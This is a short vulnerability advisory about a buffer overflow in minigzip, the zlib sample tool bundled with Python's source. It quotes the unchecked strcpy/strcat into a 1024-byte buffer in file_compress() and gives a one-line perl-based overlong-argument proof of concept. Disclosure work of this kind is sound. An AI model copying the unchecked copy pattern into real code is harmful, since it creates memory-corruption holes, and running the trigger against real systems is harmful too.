<div id="mb_0"><span style="font-weight: bold;">Description:</span><br><br>The source of python contain a various modules, the zlib module contain a minigzip tool, ( * <span style="text-decoration: underline;">minigzip is a minimal implementation of the gzip utility.
</span> ).<br><br><span style="font-weight: bold;">Source error:</span><br><br>the error was found in:<br>- <span style="font-style: italic;">void file_compress(file, mode)</span><br>because the use of strcpy() is inapropriatly
<br><br><span style="font-style: italic;">--</span><br style="font-style: italic;"><span style="font-style: italic;">#define MAX_NAME_LEN 1024</span><br style="font-style: italic;"><span style="font-style: italic;">[..]</span>
<br style="font-style: italic;"><span style="font-style: italic;">void file_compress(file, mode)</span><br style="font-style: italic;"><span style="font-style: italic;"> char *file;</span><br style="font-style: italic;">
<span style="font-style: italic;"> char *mode;</span><br style="font-style: italic;"><span style="font-style: italic;">{</span><br style="font-style: italic;"><span style="font-style: italic;"> local char outfile[MAX_NAME_LEN];
</span><br style="font-style: italic;"><span style="font-style: italic;"> FILE *in;</span><br style="font-style: italic;"><span style="font-style: italic;"> gzFile out;</span><br style="font-style: italic;"><br style="font-style: italic;">
<span style="font-style: italic;"> strcpy(outfile, file);</span><br style="font-style: italic;"><span style="font-style: italic;"> strcat(outfile, GZ_SUFFIX);</span><br style="font-style: italic;"><span style="font-style: italic;">
--</span><br><br>the function <span style="font-style: italic;">file_compress()</span> was called by main() function.<br><br><span style="font-weight: bold;">Proof of concept:</span><br><br>if you want test the vulnerability try:
<br><span style="font-style: italic;">$ minigzip `perl -e "print 'A'x1050"`<br><br></span>-- starcadi<br>
</div>